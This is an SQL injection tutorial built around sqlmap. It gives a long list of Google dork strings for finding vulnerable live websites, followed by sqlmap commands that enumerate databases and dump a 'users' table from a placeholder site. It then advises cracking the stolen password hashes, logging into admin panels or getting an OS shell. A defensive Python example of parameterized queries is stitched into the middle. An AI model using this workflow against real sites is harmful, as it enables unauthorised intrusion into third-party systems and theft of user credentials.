Topic 6b - Web Application SQL Injection Testing - Using Sqmap

Sqlmap is a Python tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Given a URL, it can find database names, tables, columns, extract data, and even get remote code execution under certain conditions by exploiting SQL injection vulnerabilities.


Hacking Web Applications: Sql injection using Sqlmap

Sqlmap
• Sqlmap is one of the most popular and powerful SQL injection automation tools out there.
• Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables, etc.
• It can even read and write files on the remote file system under certain conditions.
• Written in Python, it is one of the most powerful hacking tools out there.
• Sqlmap is the Metasploit of SQL injection.

• Sqlmap is included in pen testing Linux distributions like Kali Linux, BackTrack, BackBox, etc.

• On other operating systems, it can simply be downloaded from the following URL: http://sqlmap.org/.

• Since it is written in Python, you first have to install Python on your system if you are using Windows.

Step 1: Find a Vulnerable Website
• This is usually the toughest bit and takes longer than any of the other steps.
• Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search in Google.
• Just copy and paste any of the lines into Google and Google will show you a number of search results.

1|Page
Step 1.a: Google Dorks strings to find vulnerable, SQLMAP SQL-injectable websites
Examples

Google Dork string Column 1 | Google Dork string Column 2 | Google Dork string Column 3

inurl:item_id= | inurl:review.php?id= | inurl:hosting_info.php?id=
inurl:newsid= | inurl:iniziativa.php?in= | inurl:gallery.php?id=
inurl:trainers.php?id= | inurl:curriculum.php?id= | inurl:rub.php?idr=
inurl:news-full.php?id= | inurl:labels.php?id= | inurl:view_faq.php?id=
inurl:news_display.php?getid= | inurl:story.php?id= | inurl:artikelinfo.php?id=
inurl:index2.php?option= | inurl:look.php?ID= | inurl:detail.php?ID=
inurl:readnews.php?id= | inurl:newsone.php?id= | inurl:index.php?=
inurl:top10.php?cat= | inurl:aboutbook.php?id= | inurl:profile_view.php?id=
inurl:newsone.php?id= | inurl:material.php?id= | inurl:category.php?id=
inurl:event.php?id= | inurl:opinions.php?id= | inurl:publications.php?id=
inurl:product-item.php?id= | inurl:announce.php?id= | inurl:fellows.php?id=
inurl:sql.php?id= | inurl:rub.php?idr= | inurl:downloads_info.php?id=
inurl:index.php?catid= | inurl:galeri_info.php?l= | inurl:prod_info.php?id=
inurl:news.php?catid= | inurl:tekst.php?idt= | inurl:shop.php?do=part&id=
inurl:index.php?id= | inurl:newscat.php?id= | inurl:productinfo.php?id=
inurl:newsticker_info.php?idn= | inurl:news.php?id= | inurl:collectionitem.php?id=
inurl:index.php?id= | inurl:rubrika.php?idr= | inurl:band_info.php?id=
inurl:trainers.php?id= | inurl:rubp.php?idr= | inurl:product.php?id=
inurl:buy.php?category= | inurl:offer.php?idf= | inurl:releases.php?id=
inurl:article.php?ID= | inurl:art.php?idm= | inurl:ray.php?id=
inurl:play_old.php?id= | inurl:title.php?id= | inurl:produit.php?id=
inurl:declaration_more.php?decl_id= | inurl:news_view.php?id= | inurl:pop.php?id=
inurl:select_biblio.php?id= | inurl:pageid= | inurl:shopping.php?id=
inurl:games.php?id= | inurl:humor.php?id= | inurl:productdetail.php?id=
inurl:page.php?file= | inurl:aboutbook.php?id= | inurl:post.php?id=
inurl:ogl_inet.php?ogl_id= | inurl:newsDetail.php?id= | inurl:viewshowdetail.php?id=
inurl:fiche_spectacle.php?id= | inurl:gallery.php?id= | inurl:clubpage.php?id=
inurl:communique_detail.php?id= | inurl:article.php?id= | inurl:memberInfo.php?id=
inurl:show.php?id= | inurl:sem.php3?id= | inurl:section.php?id=
inurl:staff_id= | inurl:kategorie.php4?id= | inurl:theme.php?id=
inurl:newsitem.php?num= | inurl:news.php?id= | inurl:page.php?id=
inurl:shredder-categories.php?id= | inurl:readnews.php?id= | inurl:index.php?id=
inurl:top10.php?cat= | inurl:faq2.php?id= | inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID= | inurl:historialeer.php?num= | inurl:show_an.php?id=
inurl:reagir.php?num= | inurl:preview.php?id= | inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= | inurl:loadpsb.php?id= | inurl:transcript.php?id=
inurl:forum_bds.php?num= | inurl:opinions.php?id= | inurl:channel_id=
inurl:game.php?id= | inurl:spr.php?id= | inurl:aboutbook.php?id=
inurl:view_product.php?id= | inurl:pages.php?id= | inurl:preview.php?id=
inurl:newsone.php?id= | inurl:announce.php?id= | inurl:loadpsb.php?id=
inurl:sw_comment.php?id= | inurl:clanek.php4?id= | inurl:pages.php?id=
inurl:news.php?id= | inurl:participant.php?id=
inurl:avd_start.php?avd= | inurl:download.php?id=
inurl:event.php?id= | inurl:main.php?id=
inurl:product-item.php?id= | inurl:review.php?id=
inurl:sql.php?id= | inurl:chappies.php?id=
inurl:material.php?id= | inurl:read.php?id=
inurl:clanek.php4?id= | inurl:prod_detail.php?id=
inurl:announce.php?id= | inurl:viewphoto.php?id=
inurl:chappies.php?id= | inurl:article.php?id=
inurl:read.php?id= | inurl:person.php?id=
inurl:viewapp.php?id= | inurl:productinfo.php?id=
inurl:viewphoto.php?id= | inurl:showimg.php?id=
inurl:rub.php?idr= | inurl:view.php?id=
inurl:galeri_info.php?l= | inurl:website.php?id=

Discover Databases

Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system.

The "--dbs" option is used to get the database list.

The output shows the existing databases on the remote system.
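What makes a URL such as section.php?id=51 exploitable in the first place is a handler that pastes the id parameter straight into the query text. The following is an added example, not code from the original page or from the sqlmap project: a constructed in-memory SQLite table (the table name `section` and its rows are assumptions) queried once in the vulnerable concatenating style and once in a hardened form that validates the parameter's type and binds it, so that a value which changes the query's logic in the first version simply returns nothing in the second.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the site's database; the rows are made up for this example.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE section (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO section VALUES (?, ?, ?)",
        [
            (50, "About us", "public"),
            (51, "Products", "public"),
            (52, "Internal notes", "staff only"),
        ],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    # Same shape as a section.php?id=51 handler that concatenates the raw parameter into SQL.
    # Whatever the client sends becomes part of the statement, which is what sqlmap detects.
    sql = "SELECT id, title FROM section WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, raw_id):
    # 1. Enforce the expected type: a section id is an integer, nothing else is accepted.
    try:
        section_id = int(raw_id)
    except ValueError:
        return []  # a real handler would answer 400 Bad Request here
    # 2. Bind the value as a parameter; the driver never treats it as SQL text.
    return conn.execute(
        "SELECT id, title FROM section WHERE id = ?", (section_id,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "51"))          # the intended single row
    print(lookup_vulnerable(conn, "51 OR 1=1"))   # the tautology widens the result to every row
    print(lookup_hardened(conn, "51"))            # still the intended single row
    print(lookup_hardened(conn, "51 OR 1=1"))     # rejected before it reaches the database
```

The two defences are independent: parameter binding alone already stops the injected text from altering the statement, and the integer check in front of it turns malformed input into a clean error instead of a database round trip, which also makes a scanner's probes stand out in the application's own logs.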

Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'safecosmetics'.

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns
of some important table.

Let's say the table is 'users' and it contains the username and password.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

Get data from a table

Now comes the most interesting part: extracting the data from the table.

The command would be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this

• The hash column seems to have the password hash. Try cracking the hash and then you would get the login details right away.
• sqlmap will create a CSV file containing the dumped data for easy analysis.
• So far we have been able to collect a lot of information from the remote database using sqlmap.
• It's almost like having direct access to the remote database through a client like phpMyAdmin.
• In real scenarios hackers would try to gain a higher level of access to the system.
• For this, they would try to crack the password hashes and try to log in through the admin panel. Or they would try to get an OS shell using sqlmap.
